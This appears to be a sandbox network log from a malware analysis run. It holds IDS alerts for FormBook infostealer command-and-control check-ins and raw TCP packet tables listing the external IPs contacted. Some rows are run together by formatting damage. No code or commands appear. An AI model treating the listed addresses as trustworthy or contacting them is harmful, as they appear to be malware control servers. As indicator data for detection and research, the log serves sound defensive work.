2025-01-09T16:57:04.782211+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49871 | 104.21.32.1 | 80 | TCP
2025-01-09T16:57:07.466673+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49872 | 104.21.32.1 | 80 | TCP
2025-01-09T16:57:10.239085+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49873 | 104.21.32.1 | 80 | TCP
2025-01-09T16:57:16.761522+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49874 | 47.83.1.90 | 80 | TCP
2025-01-09T16:57:19.624236+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49875 | 47.83.1.90 | 80 | TCP
2025-01-09T16:57:22.481832+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49876 | 47.83.1.90 | 80 | TCP
2025-01-09T16:57:25.324867+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49877 | 47.83.1.90 | 80 | TCP
2025-01-09T16:57:33.954130+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49878 | 194.9.94.85 | 80 | TCP
2025-01-09T16:57:39.268222+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49879 | 45.33.2.79 | 80 | TCP
2025-01-09T16:57:41.954078+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49880 | 45.33.2.79 | 80 | TCP
2025-01-09T16:57:44.641972+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49881 | 45.33.2.79 | 80 | TCP
2025-01-09T16:57:47.321678+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49882 | 45.33.2.79 | 80 | TCP
2025-01-09T16:57:53.012748+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49883 | 104.21.32.1 | 80 | TCP
2025-01-09T16:57:55.676284+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49884 | 104.21.32.1 | 80 | TCP
2025-01-09T16:57:58.348105+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49885 | 104.21.32.1 | 80 | TCP
2025-01-09T16:58:00.985202+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49886 | 104.21.32.1 | 80 | TCP
2025-01-09T16:58:06.393139+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49887 | 199.192.21.169 | 80 | TCP
2025-01-09T16:58:09.106949+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49888 | 199.192.21.169 | 80 | TCP
2025-01-09T16:58:11.813837+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49889 | 199.192.21.169 | 80 | TCP
2025-01-09T16:58:14.525215+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49890 | 199.192.21.169 | 80 | TCP
2025-01-09T16:58:29.109139+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49891 | 47.83.1.90 | 80 | TCP
2025-01-09T16:58:31.945382+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49892 | 47.83.1.90 | 80 | TCP
2025-01-09T16:58:34.815159+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49893 | 47.83.1.90 | 80 | TCP
2025-01-09T16:58:37.649832+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49894 | 47.83.1.90 | 80 | TCP
2025-01-09T16:58:42.958756+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49895 | 13.248.169.48 | 80 | TCP
2025-01-09T16:58:45.628143+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49896 | 13.248.169.48 | 80 | TCP
2025-01-09T16:58:48.303957+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.30 | 49897 | 13.248.169.48 | 80 | TCP
2025-01-09T16:58:50.987001+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.30 | 49898 | 13.248.169.48 | 80 | TCP
                                                                                    2025-01-09T16:58:56.719814+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049899160.25.166.12380TCP
                                                                                    2025-01-09T16:58:59.607669+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049900160.25.166.12380TCP
                                                                                    2025-01-09T16:59:02.498649+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049901160.25.166.12380TCP
                                                                                    2025-01-09T16:59:05.402450+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049902160.25.166.12380TCP
                                                                                    2025-01-09T16:59:10.674523+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049903172.67.132.22780TCP
                                                                                    2025-01-09T16:59:13.329885+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049904172.67.132.22780TCP
                                                                                    2025-01-09T16:59:15.987992+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.3049905172.67.132.22780TCP
                                                                                    2025-01-09T16:59:18.658329+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.3049906172.67.132.22780TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Jan 9, 2025 16:55:19.503343105 CET804984313.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:55:19.503366947 CET804984313.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:55:19.503582001 CET4984380192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:55:20.868329048 CET4984380192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:55:21.886815071 CET4984480192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:55:22.025398970 CET804984413.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:55:22.025696993 CET4984480192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:55:22.034774065 CET4984480192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:55:22.175661087 CET804984413.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:55:22.175705910 CET804984413.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:55:22.176095009 CET4984480192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:55:22.179029942 CET4984480192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:55:22.316160917 CET804984413.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:55:27.834079981 CET4984580192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:28.176071882 CET8049845160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:28.176358938 CET4984580192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:28.188802004 CET4984580192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:28.530328035 CET8049845160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:28.531186104 CET8049845160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:28.531197071 CET8049845160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:28.531204939 CET8049845160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:28.531368017 CET4984580192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:29.694669962 CET4984580192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:30.712416887 CET4984680192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:31.071142912 CET8049846160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:31.071650982 CET4984680192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:31.089350939 CET4984680192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:31.447458029 CET8049846160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:31.447804928 CET8049846160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:31.447814941 CET8049846160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:31.447823048 CET8049846160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:31.447954893 CET4984680192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:32.600173950 CET4984680192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:33.618108034 CET4984780192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:33.966655016 CET8049847160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:33.966839075 CET4984780192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:33.979420900 CET4984780192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:34.327749014 CET8049847160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:34.327864885 CET8049847160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:34.328692913 CET8049847160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:34.328737020 CET8049847160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:34.328769922 CET8049847160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:34.328799963 CET8049847160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:34.328891039 CET4984780192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:34.677002907 CET8049847160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:36.508709908 CET4984880192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:36.860796928 CET8049848160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:36.861021042 CET4984880192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:36.868823051 CET4984880192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:37.220298052 CET8049848160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:37.220998049 CET8049848160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:37.221043110 CET8049848160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:37.221077919 CET8049848160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:37.221311092 CET4984880192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:37.221311092 CET4984880192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:37.223803997 CET4984880192.168.11.30160.25.166.123
                                                                                    Jan 9, 2025 16:55:37.575244904 CET8049848160.25.166.123192.168.11.30
                                                                                    Jan 9, 2025 16:55:42.409455061 CET4984980192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:42.528930902 CET8049849172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:42.529107094 CET4984980192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:42.542651892 CET4984980192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:42.661993980 CET8049849172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:42.695679903 CET8049849172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:42.696388960 CET8049849172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:42.696548939 CET4984980192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:44.050713062 CET4984980192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:45.069061995 CET4985080192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:45.187971115 CET8049850172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:45.188227892 CET4985080192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:45.201143026 CET4985080192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:45.320131063 CET8049850172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:45.402821064 CET8049850172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:45.403723001 CET8049850172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:45.403919935 CET4985080192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:46.706442118 CET4985080192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:47.724271059 CET4985180192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:47.843724012 CET8049851172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:47.843964100 CET4985180192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:47.856874943 CET4985180192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:47.856925011 CET4985180192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:47.976377964 CET8049851172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:47.976438046 CET8049851172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:47.976444960 CET8049851172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:47.976699114 CET8049851172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:47.994868040 CET8049851172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:47.995325089 CET8049851172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:47.995536089 CET4985180192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:49.362049103 CET4985180192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:50.380451918 CET4985280192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:50.499102116 CET8049852172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:50.499270916 CET4985280192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:50.507252932 CET4985280192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:50.625869989 CET8049852172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:50.646014929 CET8049852172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:50.646414995 CET8049852172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:55:50.646652937 CET4985280192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:50.649425030 CET4985280192.168.11.30172.67.132.227
                                                                                    Jan 9, 2025 16:55:50.767807961 CET8049852172.67.132.227192.168.11.30
                                                                                    Jan 9, 2025 16:56:04.428009033 CET4985380192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:04.657123089 CET8049853136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:04.657282114 CET4985380192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:04.669420958 CET4985380192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:04.898581028 CET8049853136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:04.898854971 CET8049853136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:04.898863077 CET8049853136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:04.899063110 CET4985380192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:06.170857906 CET4985380192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:07.188749075 CET4985480192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:07.412476063 CET8049854136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:07.412628889 CET4985480192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:07.436496019 CET4985480192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:07.660286903 CET8049854136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:07.660809994 CET8049854136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:07.660819054 CET8049854136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:07.661034107 CET4985480192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:08.951438904 CET4985480192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:09.969362020 CET4985580192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:10.193658113 CET8049855136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:10.193849087 CET4985580192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:10.206928015 CET4985580192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:10.206948042 CET4985580192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:10.431315899 CET8049855136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:10.433151960 CET8049855136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:10.433423042 CET8049855136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:10.433511019 CET8049855136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:10.433693886 CET8049855136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:10.433955908 CET4985580192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:11.716468096 CET4985580192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:12.734649897 CET4985680192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:12.962680101 CET8049856136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:12.963001966 CET4985680192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:12.971327066 CET4985680192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:13.199506044 CET8049856136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:13.199781895 CET8049856136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:13.199790001 CET8049856136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:13.200100899 CET4985680192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:13.202713966 CET4985680192.168.11.30136.243.64.147
                                                                                    Jan 9, 2025 16:56:13.430692911 CET8049856136.243.64.147192.168.11.30
                                                                                    Jan 9, 2025 16:56:18.808187962 CET4985780192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:19.107914925 CET8049857202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:19.108100891 CET4985780192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:19.121620893 CET4985780192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:19.421605110 CET8049857202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:19.465543985 CET8049857202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:19.465554953 CET8049857202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:19.465774059 CET4985780192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:20.636356115 CET4985780192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:21.654850006 CET4985880192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:21.952291965 CET8049858202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:21.952497959 CET4985880192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:21.966253996 CET4985880192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:22.263890982 CET8049858202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:22.308672905 CET8049858202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:22.308686018 CET8049858202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:22.308846951 CET4985880192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:23.479444027 CET4985880192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:24.497936964 CET4985980192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:24.791661024 CET8049859202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:24.791867018 CET4985980192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:24.805553913 CET4985980192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:24.805605888 CET4985980192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:25.099350929 CET8049859202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:25.099464893 CET8049859202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:25.099709034 CET8049859202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:25.147938013 CET8049859202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:25.147947073 CET8049859202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:25.148180962 CET4985980192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:26.306991100 CET4985980192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:27.325150013 CET4986080192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:27.620491028 CET8049860202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:27.620678902 CET4986080192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:27.628243923 CET4986080192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:27.923834085 CET8049860202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:28.133764982 CET8049860202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:28.133774042 CET8049860202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:28.134094000 CET4986080192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:28.137603998 CET4986080192.168.11.30202.95.11.110
                                                                                    Jan 9, 2025 16:56:28.432694912 CET8049860202.95.11.110192.168.11.30
                                                                                    Jan 9, 2025 16:56:33.400522947 CET4986180192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:56:33.539371967 CET804986113.248.169.48192.168.11.30
                                                                                    Jan 9, 2025 16:56:33.539858103 CET4986180192.168.11.3013.248.169.48
                                                                                    Jan 9, 2025 16:56:33.551520109 CET4986180192.168.11.3013.248.169.48
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Jan 9, 2025 16:56:33.688316107 CET  80           49861      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:33.688343048 CET  80           49861      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:33.688550949 CET  49861        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:35.055022955 CET  49861        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:36.073268890 CET  49862        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:36.210022926 CET  80           49862      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:36.210287094 CET  49862        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:36.223210096 CET  49862        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:36.359236002 CET  80           49862      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:36.359400988 CET  80           49862      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:36.359726906 CET  49862        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:37.726299047 CET  49862        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:38.744704962 CET  49863        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:39.757005930 CET  49863        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:39.895569086 CET  80           49863      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:39.895848989 CET  49863        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:39.909548998 CET  49863        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:39.909611940 CET  49863        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:40.046780109 CET  80           49863      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:40.046791077 CET  80           49863      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:40.046983004 CET  80           49863      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:40.047153950 CET  49863        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:41.412940025 CET  49863        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:42.431365013 CET  49864        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:42.570142031 CET  80           49864      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:42.570372105 CET  49864        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:42.578635931 CET  49864        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:42.719249010 CET  80           49864      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:42.719259024 CET  80           49864      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:42.719717026 CET  49864        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:42.722006083 CET  49864        80         192.168.11.30    13.248.169.48
Jan 9, 2025 16:56:42.859292984 CET  80           49864      13.248.169.48    192.168.11.30
Jan 9, 2025 16:56:47.994776011 CET  49865        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:48.168503046 CET  80           49865      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:48.168781042 CET  49865        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:48.182256937 CET  49865        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:48.356173992 CET  80           49865      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:48.438275099 CET  80           49865      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:48.438287973 CET  80           49865      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:48.438416958 CET  49865        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:49.692410946 CET  49865        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:50.710441113 CET  49867        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:50.884219885 CET  80           49867      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:50.884423971 CET  49867        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:50.896884918 CET  49867        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:51.070655107 CET  80           49867      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:51.152040005 CET  80           49867      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:51.152056932 CET  80           49867      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:51.152255058 CET  49867        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:52.410506010 CET  49867        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:53.432590008 CET  49868        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:53.606401920 CET  80           49868      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:53.606641054 CET  49868        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:53.626156092 CET  49868        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:53.800143957 CET  80           49868      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:53.800153971 CET  80           49868      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:53.800162077 CET  80           49868      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:53.880795956 CET  80           49868      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:53.880808115 CET  80           49868      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:53.881158113 CET  49868        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:55.128619909 CET  49868        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:56.147097111 CET  49869        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:56.320957899 CET  80           49869      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:56.321233034 CET  49869        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:56.329521894 CET  49869        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:56.503701925 CET  80           49869      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:56.584871054 CET  80           49869      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:56.585000992 CET  80           49869      103.106.67.112   192.168.11.30
Jan 9, 2025 16:56:56.585335970 CET  49869        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:56.587727070 CET  49869        80         192.168.11.30    103.106.67.112
Jan 9, 2025 16:56:56.761677980 CET  80           49869      103.106.67.112   192.168.11.30
Jan 9, 2025 16:57:01.728938103 CET  49870        80         192.168.11.30    104.21.32.1
Jan 9, 2025 16:57:01.847616911 CET  80           49870      104.21.32.1      192.168.11.30
Jan 9, 2025 16:57:01.847954988 CET  49870        80         192.168.11.30    104.21.32.1
Jan 9, 2025 16:57:01.860265017 CET  49870        80         192.168.11.30    104.21.32.1
Jan 9, 2025 16:57:01.978955984 CET  80           49870      104.21.32.1      192.168.11.30
Jan 9, 2025 16:57:02.222666979 CET  80           49870      104.21.32.1      192.168.11.30
